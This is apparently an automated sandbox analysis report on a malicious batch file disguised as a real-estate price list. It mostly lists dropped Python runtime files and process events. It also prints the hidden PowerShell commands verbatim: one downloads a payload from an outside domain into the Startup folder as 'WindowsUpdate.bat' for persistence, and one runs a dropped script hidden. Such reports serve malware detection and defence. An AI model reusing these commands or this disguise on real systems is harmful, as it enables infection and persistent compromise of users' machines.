Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat

Static file information: File size 2120253 > 1048576

Source:	Binary string: D:\_w\1\b\bin\amd64\python.pdb source: python.exe, 00000012.00000000.3105393236.00007FF60C6C3000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.16.dr
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-39\Release\dde.pdb''!GCTL source: dde.pyd.16.dr
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-39\Release\dde.pdb source: dde.pyd.16.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;	Jump to behavior

Source: mfc140u.dll.16.dr	Static PE information: section name: .didat
Source: scintilla.dll.16.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.16.dr	Static PE information: section name: .00cfg
Source: vcruntime140.dll.16.dr	Static PE information: section name: _RDATA
Source: libssl-1_1.dll.16.dr	Static PE information: section name: .00cfg

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_00007FF848DC00BD pushad ; iretd

5_2_00007FF848DC00C1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libffi-7.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\odbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\Pythonwin.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libssl-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\websockets\speedups.cp39-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\python39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\dde.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\pythonservice.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32uiole.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\perfmon.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\scintilla.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ctypes_test.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\perfmondata.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pywin32_system32\pythoncom39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\mmapfile.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\win32\servicemanager.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\python.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\pywin32_system32\pywintypes39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\python39\DLLs\_socket.pyd	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\python39\Lib\site-packages\isapi\README.txt

Jump to behavior

Boot Survival

Drops script or batch files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
